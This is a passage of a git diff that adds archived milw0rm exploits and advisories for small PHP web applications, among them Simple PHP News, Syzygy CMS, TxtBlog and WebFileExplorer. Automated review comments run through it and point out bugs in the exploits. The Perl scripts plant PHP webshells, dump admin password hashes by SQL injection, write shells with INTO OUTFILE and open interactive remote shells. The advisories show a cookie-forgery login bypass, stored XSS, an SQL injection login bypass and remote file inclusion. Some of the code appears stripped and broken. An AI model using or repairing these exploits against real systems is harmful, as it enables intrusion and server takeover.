s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Pyrophobia Forum RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". 
+ " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt b/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt new file mode 100644 index 0000000..2164301 --- /dev/null +++ b/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt 
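Review bot: The header claims `Works regardless of php.ini settings !`, but the main loop depends on the `%00` suffix (`$null_byte`) truncating the include path after the log file name, and that is a property of the PHP version rather than of php.ini — to my knowledge PHP rejects NUL bytes in include paths since 5.3.4 — so the comment should be qualified, e.g. `# Relies on null-byte truncation of the include path, which depends on the PHP version, not php.ini`. On the application side the quoted `index.php` excerpt shows why `stripslashes()` and `htmlspecialchars()` are not path sanitisation and why the `file_exists('content/'.$pid.'.php')` check does not help: `../` sequences still resolve to an existing file. The fix is to validate `$pid` against an allowlist of content page names (or at minimum reject anything outside `[A-Za-z0-9_-]`) before it reaches `include()`. The strict/warnings and empty-prototype style issues are the same as in the PHPbbBook script.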
@@ -0,0 +1,96 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : RSMScript 1.21 +Download : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1 +Vulnerability : Insecure Cookie Handling / XXS +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/verify.php + +[CODE] + +if($admin_pass == $code) +{ + setcookie("verified", "null", time()+1800); + header( 'refresh: 0; url=update.php' ); +} + +[/CODE] + +As we can see, if the password "$code" typed is the same of $admin_pass, so you log in, +cookie is set with the name "verified" and with content "null". So, a malicious user +can just set up a cookie with that name and value, and then he will be logged as the +admin. + +[!] FIX: A fix could be to put as a content or cookie name the password. Example: + +[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/"; + +######################################################################################### +[0x03] Bug: [XSS] +###### + +To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;) +There are two bugged file. + +1) /[path/submit.php + In this file, we can put arbitrary data into a .txt file. + + [CODE] + + $quote = $_REQUEST['quote']; + $writePage = fopen('quotes.txt', 'a') or die("can't open file"); + fwrite($writePage, "\t"); + fwrite($writePage, stripslashes($quote)); + fclose($writePage); + + [/CODE] + + [!] FIX: Just filter direct user input. + + +2) /path/update.php + This file gets quotes.txt content, and print it directly into html code. 
+ In 1) we saw that we can put arbitrary data into this .txt file. Just + Put js code ;) + + [CODE] + + $quotes = file_get_contents("quotes.txt"); + $quotes= preg_split("/[\t]+/", $quotes); + $i = 0; + $noQuotes = sizeOf($quotes); + while ($i < $noQuotes) + { + $quote = $quotes[$i]; + echo ''; + $i = $i + 1; + } + + [/CODE] + + [!] FIX: A fix could be just to filter input before being printed in html code. + + +## How to exploit this bugs? + +[!] EXPLOIT: /[path]/submit.php?quote= + +######################################################################################### +[/END] + +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/S40 CMS 0.4.2b - Local File Inclusion.txt b/S40 CMS 0.4.2b - Local File Inclusion.txt new file mode 100644 index 0000000..d145261 --- /dev/null +++ b/S40 CMS 0.4.2b - Local File Inclusion.txt 
@@ -0,0 +1,93 @@ +[Security Advisory Details: 07/04/2001] + +[Script] S40 CMS 0.4.2 Beta +[Location] http://s40.biz/?p=download +[Vulnerability] Local File Inclusion +[Original Adv] http://y-osirys.com/security/exploits/id27 +[Author] Giovanni Buzzin, "Osirys" +[Site] y-osirys.com +[Contact] osirys[at]autistici[dot]org + + +------------------------------------------------------------------------------------------------------------ +[CMS Description] + +S40 CMS is FREE Content Management System +S40 CMS 0.4 beta is lightwieght flat file CMS written on PHP, suitable for small and medium sites. +S40 is open-source MIT-license CMS developed by AWEN art studio Ltd. +S40 is fast and easy to customize system with build-in installer. + + +------------------------------------------------------------------------------------------------------------ +[Security Flaw] + +S40 CMS is prone to Local File Inclusion vulnerability because of poor security checks and bad input +sanitization: GET variables are not properly sanitized before being included via require() PHP function. + +[code:index.php] + + Simple PHP News 1.0 Final +# Downl => http://www.hotscripts.com/jump.php?listing_id=66376&jump_type=1 + +# Remote Command Execution Exploit +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org +# Thx&Greets to: evilsocket + +# A personal comment : just bleah !! + +# Tested with: Magic Quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce_lol.txt http://localhost/php_simple_news/ + +# --------------------------------- +# Simple PHP News RCE Exploit +# by Osirys +# --------------------------------- + +# [*] Adding new evil news .. +# [*] RCE Created ! +# [&] Hi my master, do your job now [!] 
+ +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/php_simple_news +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $post_pag = "/post.php"; +my $rce_path = "/display.php"; +my $rand = int(rand 99) +1; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $date = &date; +my $url = $path.$post_pag; + +my $code = "title=Shout&date=".$date. "&post=%3C%3Fphp%0D%0Aecho+". + "%22shoutZ0".$rand."%22%3B%0D%0Aif%28get_magic_quotes_". + "gpc%28%29%29%7B%0D%0A+++%24_GET%5Bcmd%5D%3Dstripslash". + "es%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D%0D%0Asystem%28%2". + "4_GET%5Bcmd%5D%29%3B%0D%0Aecho+%22-0Ztuohs".$rand."%2". + "2%3B%0D%0A%3F%3E"; + +my $length = length($code); + +my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + +my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + +print "[*] Adding new evil news ..\n"; +$socket->send($data); + +while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Entry added successfully/) { + $own = 1; + print "[*] RCE Created ! 
\n"; + } +} +$own == 1 || die "[-] Can't send new news !\n"; + +print "[&] Hi my master, do your job now [!]\n\n"; +&exec_cmd; + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host.$rce_path."?cmd=".$cmd; + $re = get_req($exec_url); + $content = tag($re); + if ($content =~ /shoutZ0$rand(.*)-0Ztuohs$rand/) { + $out = $1; + @outs = split //, $out; + foreach my $e(@outs) { + $e =~ s/\*/\n/; + print $e; + } + &exec_cmd; + } + elsif ($content =~ /shoutZ0$rand-0Ztuohs$rand/) { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub date { + my $year = (localtime)[5] + 1900; + my $month = (localtime)[4]; + my $day = (localtime)[3]; + $month =~ s/([0-9]{1})/0$1/ if ($month =~ /[0-9]{1}/); + $day =~ s/([0-9]{1})/0$1/ if ($day =~ /[0-9]{1}/); + my $date = $month."/".$day."/".$year; + return($date); +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/\n/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Simple PHP News RCE Exploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! 
\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl b/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl new file mode 100644 index 0000000..f654d26 --- /dev/null +++ b/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl 
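Review bot: The POST body built into `$code` stores URL-encoded PHP (`system($_GET[cmd])` between `shoutZ0<n>` and `-0Ztuohs<n>` markers) as a news entry, and nothing afterwards deletes that entry, so — as with the PhotoStand script — the header should state that a run leaves a persistent backdoor in the target's news data rather than describing it only as `Adding new evil news`, e.g. `# NOTE: creates a permanent news entry containing PHP code; remove it from the news store after testing`. For detection, a search of the news store or of `display.php` output for the literal `shoutZ0` identifies an affected installation. The application-side fix is to make sure stored posts are never executed as PHP by whatever path `display.php` uses to render them, and to escape them on output. The S40 CMS advisory earlier in this hunk appears truncated in this rendering from `[code:index.php]` onward — presumably a `<?php` block was swallowed by the extractor — so its code excerpt cannot be reviewed here.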
@@ -0,0 +1,238 @@ +#!/usr/bin/perl + +# Web App : Syzygy CMS 0.3 +# Link : http://sourceforge.net/project/downloading.php?group_id=103298&use_mirror=heanet&filename=syzygycms-0.3.tar.gz&a=89932245 +# Remote Command Execution Exploit : +# Case 1: If LFI works, exploitation via Shell Injection + LFI +# Case 2: Unless, exploitation via SQL Command Injection + +# by Giovanni Buzzin, Osirys +# osirys[at]autistici[dot]org +# osirys.org +# Greets: Drosophila + +# ---------------------------------------------------------------------------- +# Exploit Simulation // (Case 1) +# ---------------------------------------------------------------------------- +# osirys[~]>$ perl sploit.txt http://localhost/syzygy/ + +# --------------------------------- +# Syzygy CMS 0.3 RCE sploit +# by Osirys +# --------------------------------- + +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99 + +# [*] Testing LFI vulnerability +# [*] LFI works, exploiting it via SQL-LFI + +# [++] Exploiting via SQL-LFI ! +# [*] Creating remote Shell via SQL Injection .. +# [*] Spawning remote Shell via LFI .. + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/syzygy +# shell[localhost]$> exit +# [-] Quitting .. 
+# osirys[~]>$ +# ---------------------------------------------------------------------------- + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 50); +my $lfi = "/index.php?page=../../../../../../../../../"; +my $code = ""; +my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt"; +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/index.php?page=poll.php&poll=-1 union select 1,concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + my($user,$pass) = ($1,$2); + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "\n[*] Testing LFI vulnerability\n"; +my $re = get_req($host.$lfi."etc/passwd%00"); +if ($re !~ /root:x/) { + print "[-] LFI seems not working, exploiting it via SQL Command Injection !\n"; + &exploit_2; +} +else { + print "[*] LFI works, exploiting it via SQL-LFI\n"; + &exploit_1; +} + +sub exploit_1 { + print "\n[++] Exploiting via SQL-LFI !\n[*] Creating remote Shell via SQL Injection ..\n"; + my $attack = $host."/index.php?page=poll.php&poll=-1 union select 1,'".$code."',0,0,0,0,0,0,0,0,0,0,0,0,0,0 into outfile '".$file."'"; + get_req($attack); + + print "[*] Spawning remote Shell via 
LFI ..\n\n"; + $way = 1; + &exec_cmd; +} + +sub exploit_2 { + print "\n[++] Exploiting via SQL Command Injection !\n[*] Generating error through GET request ..\n"; + get_req($host."/osirys_log_test".$rand); + + print "[*] Cheeking Apache Error Log path ..\n"; + + while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/index.php?page=poll.php&poll=-1 union select 1,load_file('".$log."'),0,0,0,0,0,0,0,0,0,0,0,0,0,0"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + } + } + + $gotcha == 1 || die "[-] Couldn't file error_log !\n"; + + my $attack = $host."/index.php?page=poll.php&poll=-1 union select 1,'".$code."',0,0,0,0,0,0,0,0,0,0,0,0,0,0 into outfile '".$site_path."/files/1337.php'"; + get_req($attack); + my $test = get_req($host."/files/1337.php"); + if ($test =~ /0xExec/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + $way = 2; + &exec_cmd; + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + if ($way == 1) { + $exec_url = $host.$lfi.$file."%00&cmd=".$cmd; + } + elsif ($way == 2) { + $exec_url = $host."/files/1337.php?cmd=".$cmd; + } + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /0xExec(.+)ExeCx0/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. 
Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return($response->content); +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return($full_det); +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Syzygy CMS 0.3 RCE sploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/TxtBlog 1.0 Alpha - Remote Command Execution.pl b/TxtBlog 1.0 Alpha - Remote Command Execution.pl new file mode 100644 index 0000000..b532a12 --- /dev/null +++ b/TxtBlog 1.0 Alpha - Remote Command Execution.pl 
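Review bot: `my $code = "";` is empty, so both `exploit_1` and `exploit_2` write a file with no PHP in it via `into outfile`, and the `/0xExec/` check in `exploit_2` and the `/0xExec(.+)ExeCx0/` match in `exec_cmd` can never succeed; the payload — and the `<STDIN>` in `$cmd = ;`, which is a syntax error as written — was presumably stripped as markup when the listing was rendered and needs restoring. `exploit_2` also assigns `$exec_path = $host."/shell.php"`, which is never read (the shell is actually requested at `/files/1337.php`), so that line should be dropped rather than mislead the next reader. `$cmd` is appended to `$exec_url` with its trailing newline and without URL-encoding; `chomp $cmd;` before building the URL (the `s/\n//` only runs on the failure path) is the minimal fix.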
@@ -0,0 +1,204 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# App => TxtBlog v 1.0 Alpha +# Downl => http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip + +# Remote Command Execution Exploit +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org + +# I wrote this simple RCE exploit, just becouse by default the blog +# administration password is disabled. So, from admin panel, we can +# create .php files. + +# Tested with: Magic Quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce_bleah.txt http://localhost/txtblogcms-1.0a/ + +# --------------------------- +# TxtBlog RCE Exploit +# by Osirys +# --------------------------- + +# [+] Creating RCE file .. +# [+] RCE Created ! +# [+] File found ! +# [+] Hi my master, do your job now [!] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> whoami +# apache +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]> +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $adm_path = "/admin/index.php"; +my $rce_crea = $adm_path."?page=create"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $host.$adm_path; +my $test = get_req($url); + +if ($re !~ /Welcome to the administration/) { + my $url = $path.$rce_crea; + my $code = "title=new+page&blog=%27%3B+%20echo+%22Osirys%3Cbr%3E%22;+system%28%24_GET%5Bcmd%5D%29%3B+%24a+%3D+%27&location=&Submit=Save"; + my $length = length($code); + my $data = "POST ".$url." HTTP/1.1\r\n". 
+ "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[+] Creating RCE file ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Your new blog has been saved/) { + $own = 1; + print "[+] RCE Created ! \n"; + } + } + $own == 1 || die "[-] Can't write new file\n"; + + $mfile = &find_file; + print "[+] Hi my master, do your job now [!]\n\n"; + &exec_cmd; + +} +else { + print "[-] Administration requires password !\n"; + exit(0); +} + +sub find_file { + my $year = (localtime)[5] + 1900; + my $month = (localtime)[4]; + my $day = (localtime)[3]; + if ($month =~ /[0-9]{1}/) { $month =~ s/([0-9]{1})/0$1/; } + if ($day =~ /[0-9]{1}/) { $day =~ s/([0-9]{1})/0$1/; } + for ($i = 0;$i <= 15; $i++) { + my $url = $host."/data/".$year."/".$month."/".$day."-".$i.".php"; + my $re = get_req($url); + if ($re =~ /Osirys
/) { + $g0t = 1; + print "[+] File found !\n"; + $file_path = $url; + return($file_path); + } + } + if ($g0t != 1) { + print "[-] Can't find evil file !\n"; + exit(0); + } +} + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $mfile."?cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /Osirys
(.)/) { + push(@outs,$re); + foreach my $o(@outs) { + $o =~ s/Osirys
//; + print "$o"; + } + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------- \n". + " TxtBlog RCE Exploit \n". + " by Osirys \n". + " --------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-03] + \ No newline at end of file diff --git a/WebFileExplorer 3.1 - Authentication Bypass.txt b/WebFileExplorer 3.1 - Authentication Bypass.txt new file mode 100644 index 0000000..514039e --- /dev/null +++ b/WebFileExplorer 3.1 - Authentication Bypass.txt 
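Review bot: `find_file` zero-pads the month and day with `s/([0-9]{1})/0$1/` guarded by `/[0-9]{1}/`, which matches any digit, so two-digit values are corrupted (`25` becomes `025`, month `11` becomes `011`) and the `data/YYYY/MM/DD-N.php` probe cannot find the file on any day from the 10th or from October onward; `my $month = sprintf('%02d', (localtime)[4]); my $day = sprintf('%02d', (localtime)[3]);` fixes the padding (whether TxtBlog expects the 0-based month that `(localtime)[4]` yields is not visible here — confirm against the CMS). The earlier gate `if ($re !~ /Welcome to the administration/)` tests `$re`, which is never assigned at that point, while the admin page was fetched into `$test`, so the `[-] Administration requires password !` branch is unreachable and a protected install fails later with a confusing `Can't write new file`; it should read `if ($test !~ /Welcome to the administration/)`. `$cmd = ;` in `exec_cmd` is a syntax error as written — presumably `<STDIN>` was stripped when the listing was rendered.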
@@ -0,0 +1,64 @@ +Product Name: WebFileExplorer +Version : 3.1 +URL : http://www.webfileexplorer.com/ +Price : 99 $ USD + +Credits to : Giovanni Buzzin, "Osirys" + osirys[at]autistici[dot]org + +WebFileExplorer v3.1, is prone to multiple vulnerabilities. At first, an attacker can inject his evil sql code +in the login form, bypassing it, he just needs to know the nick of an existent username to login as him. +Live Exploiting: http://www.webfileexplorer.com/userdemo/ +Headers: +http://www.webfileexplorer.com/userdemo/body.asp + +POST /userdemo/body.asp HTTP/1.1 +Host: www.webfileexplorer.com +User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://www.webfileexplorer.com/userdemo/body.asp +Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL +Content-Type: application/x-www-form-urlencoded +Content-Length: 71 +login_name=&dologin=yes&id=admin%27+or+%271%3D1&pwd=osirysp0wa&B1=Login + +Sending this request a remote attacker is able to bypass the login form. +The sql injection used is: admin%27+or+%271%3D1 +so : admin' or '1=1 + +Once the attacker logged in, from the Control Panel he's able to do a lot of things, upload all file of any +extension, create files of any type, and so on. So this normal Authority Bypass can become a dangerous +Arbitrary Shell Upload, so kinda of Remote Command Execution. 
+ +Headers: + +http://www.webfileexplorer.com/userdemo/body.asp?action=savefile&path=/admindemo/demo/er + +POST /userdemo/body.asp?action=savefile&path=/admindemo/demo/er HTTP/1.1 +Host: www.webfileexplorer.com +User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://www.webfileexplorer.com/userdemo/body.asp?action=newfile +Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL; ControlPan=max; fileoptions=max; folderoptions=max; SearchBoxStat=max; FoldersTree=off +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 +file=test_.php&newfilestuff=%3C%3Fphp+echo+%22I%27m+horn%3Cbr%3E%22%3B+%3F%3E&submit=create+file + +Let's see now, the response of the created file: + +osirys[~]>$ perl asd.txt http://www.webfileexplorer.com/admindemo/demo/er/test_.php I'm horn
+osirys[~]>$ + +Game Over. + +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt b/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt new file mode 100644 index 0000000..f292af7 --- /dev/null +++ b/WorkSimple 1.2.1 - Remote File Inclusion Sensitive Data Disclosure.txt @@ -0,0 +1,49 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : WorkSimple 1.2.1 +Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1 +Vulnerability : Remote File Inclusion / Sensitive Data Disclosure +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay + + +######################################################################################### +[0x02] Bug:[Remote File Inclusion] +###### + +Bugged file is: /[path]/calendar.php + +[CODE] + + +[/CODE] + +$lang variable is not declared, I thought it was declared on conf.php, but it's not. +So we can set the $lang value directly from GET. + +FIX : Just declare $lang, for example in /[path]/data/conf.php + + +[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell] + +######################################################################################## +[0x03] Bug:[Sensitive Data Disclosure] +###### + +In this cms, when an user register himself, the cms puts informations like username and +password on a .txt file. So, just going on it, we can get sensitive data like username +and passoword. username:md5_hash + + +[!] EXPLOIT: /[path]/data/usr.txt + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/X-Forum 0.6.2 - Remote Command Execution.pl b/X-Forum 0.6.2 - Remote Command Execution.pl new file mode 100644 index 0000000..3e429f1 --- /dev/null 
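Review bot: The advisory describes the `id=admin%27+or+%271%3D1` login bypass and the `action=savefile` write of `test_.php` but gives no remediation, which is the one line a maintainer of this product needs; add something like `Fix: pass login_name/id/pwd as bound query parameters instead of concatenating them into the SQL, and restrict savefile/upload to an allow-list of non-executable extensions outside the web root.` The prose says the attacker "just needs to know the nick of an existent username", yet the captured request leaves `login_name=` empty and carries the payload in `id`; state explicitly which field is the injection point so the two do not read as contradicting each other. The closing transcript invokes `perl asd.txt ...` without saying what it is — presumably a trivial fetch helper — and the response text should be quoted as the fetched page body rather than run into the prompt.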
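Review bot: The suggested fix `Just declare $lang, for example in /[path]/data/conf.php` does not close the hole in `calendar.php`: the file includes a path built from `$lang`, and the advisory presumably depends on register_globals-style assignment from GET, so a declaration that is later overwritable by request data re-opens it; the FIX line should instead say `validate $lang against a fixed list of shipped language files (e.g. in_array($lang, array('en','it'), true)) and never pass request data to include; also set allow_url_include=Off.` The `data/usr.txt` disclosure likewise has no fix; `move data/ outside the web root or deny it via .htaccess, and salt the stored hashes` is the expected line. The `[CODE] ... [/CODE]` block is empty — the PHP snippet was presumably stripped as markup when the listing was rendered — so the claim that `$lang` is undeclared cannot be checked from this text.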
+++ b/X-Forum 0.6.2 - Remote Command Execution.pl 
